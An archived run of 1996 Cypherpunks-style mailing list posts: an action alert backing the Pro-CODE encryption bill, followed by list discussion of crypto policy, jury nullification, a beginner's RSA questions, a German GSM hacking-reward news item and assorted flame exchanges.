1-202-224-2551 1-202-224-1193 D NE Exon, J. J. 1-202-224-4224 1-202-224-5213 D OR Wyden, Ron* 1-202-224-5244 1-202-228-2717 R SD Pressler, Larry* 1-202-224-5842 1-202-224-1259 R MT Burns, Conrad R.(*sponsor) 1-202-224-2644 1-202-224-8594 R AK Stevens, Ted 1-202-224-3004 1-202-224-2354 R AZ McCain, John 1-202-224-2235 1-202-228-2862 R WA Gorton, Slade 1-202-224-3441 1-202-224-9393 R MS Lott, Trent* 1-202-224-6253 1-202-224-2262 R TX Hutchison, Kay Bailey 1-202-224-5922 1-202-224-0776 R ME Snowe, Olympia 1-202-224-5344 1-202-224-1946 R MO Ashcroft, John* 1-202-224-6154 1-202-228-0998 R TN Frist, Bill 1-202-224-3344 1-202-228-1264 R MI Abraham, Spencer 1-202-224-4822 1-202-224-8834 * supporter or cosponsor. The bill also enjoys broad bi-partisan support from members not on the committee including Senators Leahy (D-VT) and Murray (D-WA). 4. Here is a sample conversation: SAMPLE PHONE CALL You: Sen:Hello, Senator Mojo's office! You: SAY I'm calling to urge the Senator to pass S.1726, the THIS-> Burns/Leahy/Pressler bill, S.1726 when the committee votes on it on Thursday. It's critical to the future of privacy, security, and electronic commerce on the internet. Sen:Ok, thanks! IF THEY SAY "The Senator has concerns about the bill", please answer, "Please try to work these issues out as it moves to the Senate floor, but passage out of committee will send an important signal to the Administration." 5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM YOU. Please tell us who you called, and how they sounded. We'll be passing this information to folks in D.C. who can help apply pressure where needed. $ Mail vtw at vtw.org Subject: I called so-and-so Hey, I called Sen. Mojo. He sounded iffy, call in the reinforcements. ^D 6. Forward this to your friends and colleagues in appropriate forums until the date of expiration at the top. Forward a copy of this to your Internet Service Provider as well, and ask them to put the following text in their message of the day (motd), or on their WWW page: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT The U.S. Senate will be voting on a proposal to encourage better security on the Internet on Thu Sep. 12th. Your help is needed to call Congress. See http://www.crypto.com/ for more details. ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ________________________________________________________________________ BACKGROUND / WHAT TO EXPECT THIS WEEK For the past 3 years, Cyber-Rights Activists, citizens, and industry leaders have been working hard to reform US encryption policy. Support has been building behind several legislative proposals this year because they send a clear signal to the Administration about the need for security and privacy in the Information Age. The digital revolution is currently being held hostage by the White House's Cold War restrictions on privacy-enhancing encryption technology. Now, with Congress less than a month away from adjournment, everyone who supports encryption and privacy is working to see this bill leave committee in order to send a clear message to the White House that they are on the wrong side of the encryption issue. Although this bill may not become law this year, its passage out of committee will be a landmark event that will clearly tell the White House that the Congress, the public, and the computer industry care about security and privacy, and need strong, reliable encryption technology in order to make the Internet a viable platform for commerce, education, and democracy. Success for our side is not certain, and the next week is not without risks. On September 12th, the Senate Commerce committee will hold a "markup", where the bill is examined, voted on, and if there are enough votes, passed out of committee. Two things could happen: -the committee could pass the bill as written, -the committee could pass the bill with amendments. Any amendments are not likely to be friendly, and in particular, quiet sources have told privacy activists that the Clinton Administration has been readying a legislative assault on your right to use encryption for several weeks now. A Clipper-like amendment could be attached to the bill if our side does not have enough votes to block all amendments. It is crucial that all netizens who consider privacy and security important take a moment to call members of the Commerce Committee right now and urge them to vote S.1726 out of committee without amendments. ________________________________________________________________________ DESCRIPTION OF S.1726, PRO-CODE BILL Privacy-enhancing encryption technology is currently under heavy restrictions kept in place by the White House. Encryption that is currently allowed to be exported is not sufficient to protect confidential information. This policy acquires an "Alice-in-Wonderland" quality when one realizes that strong encryption products are available abroad both for sale and for free download off the Internet. The Pro-CODE Act resolves to: 1. Allow for the *unrestricted* export of "mass-market" or "public-domain" encryption programs, including such products as Pretty Good Privacy and popular World Wide Web browsers. 2. Requires the Secretary of Commerce to allow the less restricted export of other encryption technologies if products of similar strength are generally available outside the United States, roughly up to DES strength. 3. Prohibits the federal government from imposing mandatory key-escrow encryption policies on the domestic market and limiting the authority of the Secretary of Commerce to set standards for encryption products. ________________________________________________________________________ CHRONOLOGY OF PRO-CRYPTO LEGISLATION 9/12/96 (scheduled) Senate Commerce committee will hold markup of S.1726 and hopefully pass it out of committee with no amendments. 7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. FBI Director Louis Freeh testifies along with many cyber-luminaries. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/072596/ 6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/062696/ 5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would free public-domain encryption software (such as PGP) for export, free much commercial encryption for export, and reduce the government's ability to push Clipper proposals down the throats of an unwilling public. Original sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR). 3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills (S.1587/H.R.3011) that significantly relax export restrictions on products with encryption functionality in them, as well as free public domain software such as PGP (Pretty Good Privacy). ________________________________________________________________________ FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS There are many excellent resources online to get up to speed on crypto including the following WWW sites: http://www.crypto.com http://www.privacy.org http://www.eff.org http://www.cdt.org http://www.epic.org http://www.vtw.org Please visit them often. The following organizations have signed onto this alert: Center for Democracy and Technology Electronic Frontier Foundation Electronic Privacy Information Center Voters Telecommunications Watch ________________________________________________________________________ End alert ======================================================================== From Skonk at alpha.c2.org Wed Sep 11 00:37:34 1996 From: Skonk at alpha.c2.org (Skonk) Date: Wed, 11 Sep 1996 15:37:34 +0800 Subject: (no subject) Message-ID: <3236424B.12E5@alpha.c2.org> From Adamsc at io-online.com Wed Sep 11 00:43:07 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 11 Sep 1996 15:43:07 +0800 Subject: Movies Message-ID: <19960911054154968.AAA142@IO-ONLINE.COM> On Tue, 10 Sep 1996 13:35:52 +0200 (METDST), Asgaard wrote: >> is viewed as being essentially Mexican. (Some great humor, too. And a good >> murder mystery. And a love story. Conspiracy, humor, murder, love...all the >> ingredients of a great story. All three major American races collide, and > >I think the love ingredients, all too common in movies without adding >anything to the real story, are a pain in the behind. I usually channel- >surf during the coitus scene (one in every movie for the last year). "We've just barely managed to escape the transdimensional alien demon spawn. We're bruised and exhausted. Let's make love in this ditch and hope the alien's Nazi henchmen don't find us!" And people say Hollywood retains even a touch of reality. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From tcmay at got.net Wed Sep 11 00:43:20 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 15:43:20 +0800 Subject: Child Porn as Thoughtcrime Message-ID: Declan answers in the affirmative that, yes, nearly all of the examples I cited are indeed crimes. As I well knew, which is why I presented them. (The Jock Sturges case was in SF, the "little girls in leotards" case was only a few years ago, etc.) My point really was not to ask if the examples are illegal but to point out the "thoughtcrime" nature of making it a felony to draw pictures of naked children, when clearly no actual child was ever involved, when no actual person could have been the victim of an actual crime. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From declan at eff.org Wed Sep 11 00:45:56 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 11 Sep 1996 15:45:56 +0800 Subject: Harry Browne a cryptographer In-Reply-To: <199609102028.QAA13808@rom.oit.gatech.edu> Message-ID: Odd. When I spoke with him about crypto and geekstuff -- I thought at length -- for about an hour, he never mentioned it. -Declan On Tue, 10 Sep 1996, Will Day wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Here's an interesting detail from an AP story: > > A short time ago, at a computer terminal far, far away, Steve L. Dasbach wrote: > >From: 76060.3222 at CompuServe.COM ("Steve L. Dasbach") > >Date: 10 Sep 96 14:32:09 EDT > >Message-Id: <57196.3235C30E at dehnbase.fidonet.org> > >To: LPUS-PRES at dehnbase.fidonet.org (LP business - presidential) > >Subject: APn Article on Harry Browne > > > > By KARIN MILLER > > Associated Press Writer > > FRANKLIN, Tenn. (AP) -- > > > Browne said he formed his attitude toward government when he entered the > >U.S. Army three years after high school and became a cryptographer. > > The article didn't say anything more about his cryto past.. > > === > Will Day * * * * * * * * * * * > willday at rom.oit.gatech.edu HARRY BROWNE FOR PRESIDENT > http://rom.oit.gatech.edu/~willday/ http://www.HarryBrowne96.org/ > OIT, Georgia Tech, Atlanta 30332-0715 * * * * * * * * * * * > =-> Opinions expressed are mine alone and do not reflect OIT policy <-= > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3 > Charset: noconv > > iQCVAwUBMjXPcBDHlOdPw2ZdAQHVZwP7Bd5FJ1Usgq7TIzOGofhuC1ihc687zLg/ > pPxzR5/8DpHj6x7agdLnKyivBROX9aTE616pzgjOfqup+/VWHdxRbChJ/S0twrn0 > QPWOq4hkvrm9ygJlUSzmGMBEv4BeT/IIITlwrGUo7jaMtvemKPHiNnfE3u+Ii6xr > b44iifT6ygg= > =E9oM > -----END PGP SIGNATURE----- > // declan at eff.org // I do not represent the EFF // declan at well.com // From blancw at cnw.com Wed Sep 11 00:49:43 1996 From: blancw at cnw.com (blanc) Date: Wed, 11 Sep 1996 15:49:43 +0800 Subject: FW: Child Porn as Thoughtcrime Message-ID: <01BB9F6A.50D05180@king1-03.cnw.com> From: Blanc, responding to herself (a la Detweiler - NOT) >Many people seek after sympathy towards their feelings (present and/or future >pain) more than to be respected for the ability to think. I imagine this >develops into a reduced sympathy towards certain kinds of thought or towards >thinking per se, eventually, promoting a general atmosphere of tolerance for >offenses like "thoughtcrimes". ................................................................ This statement is entirely wrong and totally false. What I really meant to say, rather than "tolerance for offenses like...", was that there is created an atmosphere which is tolerant towards classifying certain kinds of thinking as "thought crimes". And once it is allowed that some types of thoughts, or some types of thinking, are classifiable as criminally offensive, I expect most anyone on this list can extrapolate the consequences of such a development upon the collective conscience. .. Blanc From jimbell at pacifier.com Wed Sep 11 00:58:44 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 11 Sep 1996 15:58:44 +0800 Subject: Crypto Anachy MUD Message-ID: <199609110534.WAA14548@mail.pacifier.com> At 12:01 AM 9/10/96 -0700, Timothy C. May wrote: >At 5:10 AM 9/10/96, Jon Leonard wrote: >>Duncan Frissell wrote: >>> Did anyone make the point (I gave up on the thread) that we already have a >>> great Crypto Anarchy MUD with lots of the coding already done. We call it >>> the Internet. Digital cash, strong crypto, remailers, everything. >> >>Tim May expressed doubt that it was worth the effort: Not much easier >>than the real thing, and not as good. That's the closest to your point, >>I think. >.... >>Finally, a MUD has the potential to spread crypto-anarchic ideas to people >>who would not otherwise have considered them. >> >>It may be that I'm wasting my time, but I could come up with some useful >>new crypto protocol too. > >Don't tar me with the "Tim said it was a waste of time" label. Rather, I >said I thought it would be pretty tough to get a reasonable ontology, one >with rich enough behaviors and reasonable incentives and disincentives. >Simulations are an art...they were useful in nuclear war planning, where >the degrees of freedom were constrained, and so on. Jon Leonard made it clear to me that he was planning a human-assisted game/MUD, rather than a computer simulation. His explanation is that it is difficult to implement an unbiased simulation, because it is difficult to "simulate" a human. But putting people controlling characters into the equation restores the "human element" which arguably will make the results more realistic. Makes sense to me. The one item I suggested was that instead of people controlling individual characters in this MUD, they control a "weighted character" whose weight depends on the number of people of that type in the society. After all, in the path towards a crypto anarchy-type situation, people will naturally have to migrade away from government-oriented solutions, and towards other jobs. Some will be killed, some will retire, some will switch jobs, etc. Turning such a group into a weighted character would allow their number to reflect societal changes a more quantitatively than individual characters. Jim Bell jimbell at pacifier.com From tcmay at got.net Wed Sep 11 01:01:17 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 16:01:17 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati Message-ID: At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote: >tcmay at got.net (Timothy C. May) writes: >> I didn't call for your "expulsion." No one has been expelled in four years >> of the list's existence. > >However Tim has been complaining about my postings to various people I know >and respect. (I stopped respecting Tim years ago.) And who might these people be? I suggest you name them, as I have not even mentioned your name to anyone. You don't rate a complaint from me. --TCM We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From WlkngOwl at unix.asb.com Wed Sep 11 02:51:24 1996 From: WlkngOwl at unix.asb.com (Deranged Mutant) Date: Wed, 11 Sep 1996 17:51:24 +0800 Subject: (Fnord) Edupage, 10 September 1996 Message-ID: <199609110733.DAA04996@unix.asb.com> Chances are this already made it to the list... ------- Forwarded Message Follows ------- ************************************************************ Edupage, 10 September 1996. Edupage, a summary of news about information technology, is provided three times a week as a service by Educom, a Washington, D.C.-based consortium of leading colleges and universities seeking to transform education through the use of information technology. ************************************************************ TOP STORIES Wired World Will "Diminish National Sovereignty" [..] WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" A leading Clinton Administration official on information security and cryptography matters says that traditional notions of sovereignty, national security and warfare will be undermined by the year 2020, when the whole world is "wired" and e-cash is the norm. The result will be less powerful governments in relation to criminal organizations such as the Mafia and international drug cartels, says Michael Nelson, who adds that organized crime members are already some of the most sophisticated users of computer systems and strong encryption technology. In addition, computer crackers will pose a more significant threat. In response, Nelson advocates resolving the issue of whether unauthorized access of a computer is an "act of trespass" or an "act of war," and prosecuting the intrusions accordingly. (BNA Daily Report for Executives 6 Sep 96 A14) [..] From scrappo.reverb at juno.com Wed Sep 11 03:29:28 1996 From: scrappo.reverb at juno.com (A L) Date: Wed, 11 Sep 1996 18:29:28 +0800 Subject: No Subject Message-ID: <19960910.225608.8159.0.scrappo.reverb@juno.com> I apologize for any behavior on behalf of my domain name. (A little background:) I am a cryptographer hopeful. I was interested in such things as the Caesar Cypher and the Enigma machine and the Roman encryption "padlock" when other kids were more interested in how the water fountain shot water straight up. After some thought and a little writing, I developed an encryption program using Mallard Basic on an old Amstrad (which I still grudgingly keep) with programming skills I taught myself. I know most of the basics regarding RSA, PGP, and assorted single pass (?) cyphers. One thing I do not understand has to do with how RSA sieves large primes, etc. That is one of the few things that I do not understand about RSA. Another aspect of RSA I do not understand is the usage of primes (or any number) in the actual encryption process. Does the program add numbers from the key to the plaintext to create the cyphertext, or does it use some other process. I am sorry if any of these questions seem redundant and/or stupid, but at this point in time, I can't get my hands on any actual explanation for how it works. (I would get a copy of "Applied Cryptography," but I do not have any source of income, which also explains Juno.) Aiieee!!! the dreaded "J" word! Once again, I apologize if any of this caused annoyance or sickness. From wfrench at interport.net Wed Sep 11 04:14:21 1996 From: wfrench at interport.net (Will French) Date: Wed, 11 Sep 1996 19:14:21 +0800 Subject: Please don't killfile juno.com Message-ID: <199609110846.EAA22788@interport.net> Looks to me like there's at least one person at Juno who's interested in serious crypto. This message just appeared on the list, but I'm forwarding it in case anyone's actually killfiled the site. ---begin forward--- > I apologize for any behavior on behalf of my domain name. > (A little background:) > I am a cryptographer hopeful. I was interested in such things > as the Caesar Cypher and the Enigma machine and the Roman > encryption "padlock" when other kids were more interested in > how the water fountain shot water straight up. After some > thought and a little writing, I developed an encryption > program using Mallard Basic on an old Amstrad (which I still > grudgingly keep) with programming skills I taught myself. > I know most of the basics regarding RSA, PGP, and assorted > single pass (?) cyphers. One thing I do not understand has to > do with how RSA sieves large primes, etc. That is one of the > few things that I do not understand about RSA. Another aspect > of RSA I do not understand is the usage of primes (or any > number) in the actual encryption process. Does the program add > numbers from the key to the plaintext to create the > cyphertext, or does it use some other process. > I am sorry if any of these questions seem redundant and/or > stupid, but at this point in time, I can't get my hands on any > actual explanation for how it works. (I would get a copy of > "Applied Cryptography," but I do not have any source of > income, which also explains Juno.) Aiieee!!! the dreaded "J" > word! > Once again, I apologize if any of this caused annoyance or > sickness. From gary at systemics.com Wed Sep 11 04:40:23 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 11 Sep 1996 19:40:23 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <2.2.32.19960910190024.007245e4@pop.ricochet.net> Message-ID: <32367F80.41C67EA6@systemics.com> Greg Broiles wrote: > > At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: > > >If govt. protects its "sources and methods", however nefarious, to the > >extent that the public is never asked to assent to these methods (even > >though a few of us know about them anyway), then the public doesn't have > >to become overtly cynical about what's going on. > > But the public *is* asked to assent to those methods - your chance to vote > on them is known colloquially as "jury duty". Ah, but isn't "jury selection" the process of selecting those that don't know they are judging the law as well as the case? Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From proff at suburbia.net Wed Sep 11 05:26:04 1996 From: proff at suburbia.net (Julian Assange) Date: Wed, 11 Sep 1996 20:26:04 +0800 Subject: LACC: Bernie S. attacked in prison In-Reply-To: <199609101648.MAA06069@astro.ocis.temple.edu> Message-ID: <199609110936.TAA15567@suburbia.net> > >Of course. Surprising or shocking? Not in the least. > > > > Nico Garcia > > raoul at tiac.net > > Every day that I wake up, I'm amazed at how far this country has > devolved. When rational people sit quietly and accept the abuses of the > police and other authorities, it is a sign that society has truly turned > belly-up. I was shocked. I've had some dealings with the SS. Their behavior in court, painting Ed as a "terrorist" was to be expected, NOT condoned. What happened to Ed in prison is shocking. If Ed was a killer of little children, then I could understand. He wasn't. At his worst Ed's crime was no more than petty white collar fraud. Ed would not have been imprisoned in Australia. I've reviewed many US computer crime / toll fraud cases, including sentencing decisions. I found myself very unimpressed with US sentencing guidelines, which are extremely rigid and compartmentalised, leaving a sentencing judge with almost no disgression or ability to impose a sentence that fits the crime as a whole or the defendant as a whole. Whether Nico or anyone else found the violence against Cummings "shocking" or "to be expected" or not, is of no import. No one is surprised to hear that a pretty girl walking alone through central park in the middle of the night has been brutally raped. This makes the crime, and its effects on the victim no less hideous. Those that abuse their power and inflict grave violence on others must be held accountable and their crimes deplored and punished in the strongest manner. Failure to do so merely creates an environment where such behavior becomes predominant. This is not acceptable. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From schmidt at pin.de Wed Sep 11 05:33:22 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Wed, 11 Sep 1996 20:33:22 +0800 Subject: Digital rights organisation Message-ID: Hi, thinking about what happend in Germany, are there any 'digital rights' organisations in Germany ? If not, we would like to found one. Are there any international orgs (EFF?,...) who can help us ? What goals do they have ? To Germans: How do I found an e.V. in Germany ? Thanks for the help in advance, -stephan From liberty at gate.net Wed Sep 11 07:50:07 1996 From: liberty at gate.net (Jim Ray) Date: Wed, 11 Sep 1996 22:50:07 +0800 Subject: TWA 800 - Serious thread. Message-ID: <199609111143.HAA42252@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: gary at systemics.com, cypherpunks at toad.com Date: Wed Sep 11 07:41:52 1996 Gary wrote: <...> > Ah, but isn't "jury selection" the process of selecting those that > don't > know they are judging the law as well as the case? But Gary, don't you see that's good? We need to get laws *back* against witches, against fugitive slaves, against forming unions, against drinking alcohol, etc. and truth certainly shouldn't be an absolute defense against libel! "Our" country is slowly lapsing into anarchy, and would likely go even further if we didn't have the moral Exons, Packwoods, Clintons, and Rostenkowskis to lead us and protect us! [For those who don't know me, I'm being sarcastic.] JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjalhW1lp8bpvW01AQHgLwP/Y2wSCTCqt9BDeGlcCyde3UMHb5VwthKB 0axWAEsQgdL9sDwbAlT8H1nT36q6ofBf6Hk97KB8eL5SnLQgBjA1xMMNVc2IBcFm gG8+k4Y9PndEzvYO+HreYVYEF8TFB/WhZt42mYm7ZzpkHHok3iMEHIW3ZpEzPlxc cJVATpNS6NA= =i6Nw -----END PGP SIGNATURE----- From schmidt at pin.de Wed Sep 11 08:50:30 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Wed, 11 Sep 1996 23:50:30 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: Allgaeuer Zeitung, 9.9.96 says: (A German newspaper) The German Company MobilCom wants to proove that the German GSM networks D1,D2 and E+ are secure. There have been rumors that it's possible to phone with a hacked code. If a hacker is able to phone using the number 0171 / 3 28 99 66 in Germany with a hacked code, the company will pay 100.000 DM (~65.000$) to a non profit organisation of the hackers choice. Is someone able to do this ? :) (No responsibility taken for the translation.) -stephan From pgruber at nz1.netzone.com Wed Sep 11 08:50:49 1996 From: pgruber at nz1.netzone.com (pgruber at nz1.netzone.com) Date: Wed, 11 Sep 1996 23:50:49 +0800 Subject: Factory Memory Message-ID: <199609102056.NAA28544@goodguy.goodnet.com> Factory memory update... As you know, the new software applications are very memory hungry. As a direct source for memory products we can make your memory upgrade affordable. These are the latest prices for popular memory 72 pin SIMM memory boards: 4MB $19.99 US 8MB $39.99 US 16MB $89.99 US 32MB $219.00 US Many more styles and sizes are available on our website - www.gruber.com, or call us at (602) 863-2655 or fax at (602) 257-4313 We also offer a tool free number at 800 658-5883 (USA only). Thank you, Pete Pete Gruber pgruber at netzone.com (602) 863-2655 Voice (602) 257-4313 Fax From hevnsnt at ksu.edu Wed Sep 11 09:00:54 1996 From: hevnsnt at ksu.edu (Y Do U Care) Date: Thu, 12 Sep 1996 00:00:54 +0800 Subject: hackerlist In-Reply-To: <199609011450.AAA22573@suburbia.net> Message-ID: On Mon, 2 Sep 1996, Julian Assange wrote: > > I am planning to make a list of hackers and would appreciatte it if you > > would e-mail me with the following information. > > handle > > e-mail > > city,state > > url > > whether or not you would like to recieve the list when finished > > thanks for your help > > P. Cummings > > Patrickbc at juno.com > > Are you on this list of morons? I can hardly wait for the big rush of everyone sending in their names on this one.. haha buddy... I wouldnt wait up. -HevnScenT From liberty at gate.net Wed Sep 11 09:52:24 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 12 Sep 1996 00:52:24 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609111336.JAA92112@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: m5 at tivoli.com, cypherpunks at toad.com Date: Wed Sep 11 09:35:17 1996 Mike M Nally wrote: > Declan McCullagh wrote: > > Under the Knox decision, yes. (Dancing girls in leotards are verboten.) > > Is this going to have some implications for broadcast of the women's > gymnastic events in the next Olympics? Presumably, that depends on how/where/why the cameraman zooms in, if I am reading the case (and/or the judges' minds) right. [OK, I'll shut up now.] JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjbAG21lp8bpvW01AQEpKwP+NEJ3CQ3l1D1n4rwU6WZQuZlcEe0pUYJe 7qjyknU9sTrdkmfid7PYCAWYFbLYtmT7nBzPXG/6Cxjzq3Mti6OWzvJheE30qjaY 5zndbdm++E2t4WRCu6GLVDXjjXMk118/HqR0weaNURzhhxVCJkX8WfGjYIcruZhX LguDNUs1//A= =xD4K -----END PGP SIGNATURE----- From afabbro at umich.edu Wed Sep 11 10:55:33 1996 From: afabbro at umich.edu (Andrew Fabbro) Date: Thu, 12 Sep 1996 01:55:33 +0800 Subject: number theory paper resource Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 10 Sep 1996, A L wrote: > I know most of the basics regarding RSA, PGP, and > assorted single pass (?) cyphers. One thing I do not > understand has to do with how RSA sieves large primes, As recently mention in sci.crypt...there's an interesting page with papers on number theory & cryptology at: http://www.ph.tn.tudelft.nl/~visser (~visser/crypto.html is the exact page you probably want) Andrew Fabbro [afabbro at umich.edu] http://www-personal.umich.edu/~afabbro/ PGP mail preferred; finger afabbro at us.itd.umich.edu for key "A good marketing organization listens to its customers...WE HEAR YOU!" - the National Security Agency -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjbKlboWkgjb6N6dAQFBHAP/fO8gFhbAoQiB132Aan1ZR4X3hfcoyh3n Io60fqD/5Ys1eGqaqUTxEjC1pZTzVOj5AxXYOBG7/vaqJ+FQelakW7Gs8eHTKqmA 3S4fQnISbUUrJWJf6OK7y7o+BupvZByOQ/wW4tE8xEFrSNYlKZVhFU+H/4+uOEUA QNe8amszNGo= =D6j6 -----END PGP SIGNATURE----- From grafolog at netcom.com Wed Sep 11 11:26:50 1996 From: grafolog at netcom.com (jonathon) Date: Thu, 12 Sep 1996 02:26:50 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <32367F80.41C67EA6@systemics.com> Message-ID: On Wed, 11 Sep 1996, Gary Howland wrote: > > But the public *is* asked to assent to those methods - your chance to vote > > on them is known colloquially as "jury duty". But judges have said that Jury Nullification is not acceptable legal practice. > Ah, but isn't "jury selection" the process of selecting those that don't > know they are judging the law as well as the case? You forgot something else. Jury Selection also involves the removal from the jury any individual who might have some knowledge about anything which might be relevent to the case. So the only people on juries are those who are unemployed, on uneducated or usually both. That they are easilly manipulated is a further virtue, from the POV of the Injustice system the US has. xan jonathon grafolog at netcom.com The one who does nothing can win over the one who rushes around to all the things. The one who is gentle can win over the one who is strong. From attila at primenet.com Wed Sep 11 11:39:48 1996 From: attila at primenet.com (attila) Date: Thu, 12 Sep 1996 02:39:48 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: <199609111509.JAA14414@InfoWest.COM> Ah, but Dr. Dimitri, * I * did place you in my "drop" filter long enough ago that I even forget why --and I have see no reason to change that decision from the various postings in your hand which have been made part of another's reply. --attila -- Politicians are like diapers. They both need changing regularly, and for the same reason. --- original message follows --- In , on 09/10/96 at 10:52 PM, tcmay at got.net (Timothy C. May) said: = At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote: = > tcmay at got.net (Timothy C. May) writes: = > > I didn't call for your "expulsion." No one has been expelled in = > > four years of the list's existence. = > = > However Tim has been complaining about my postings to = > various people I know and respect. (I stopped respecting = > Tim years ago.) = And who might these people be? I suggest you name them, as = I have not even mentioned your name to anyone. You don't = rate a complaint from me. =--TCM From dlv at bwalk.dm.com Wed Sep 11 11:48:06 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 12 Sep 1996 02:48:06 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: <7qi4TD1w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote: > >tcmay at got.net (Timothy C. May) writes: > >> I didn't call for your "expulsion." No one has been expelled in four years > >> of the list's existence. > > > >However Tim has been complaining about my postings to various people I know > >and respect. (I stopped respecting Tim years ago.) > > And who might these people be? I suggest you name them, as I have not even > mentioned your name to anyone. You don't rate a complaint from me. E.g. Kelly Goen is one of the people who told me that Tim May's been complaining about my alleged "spit" posts. Note that Kelly's not on this mailing list (unlike at least two other people who said to me that Tim complained to them off-list) and that most of the posts Tim complains about are obvious forgeries. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From roger at coelacanth.com Wed Sep 11 11:56:26 1996 From: roger at coelacanth.com (Roger Williams) Date: Thu, 12 Sep 1996 02:56:26 +0800 Subject: (Fnord) Edupage, 10 September 1996 In-Reply-To: 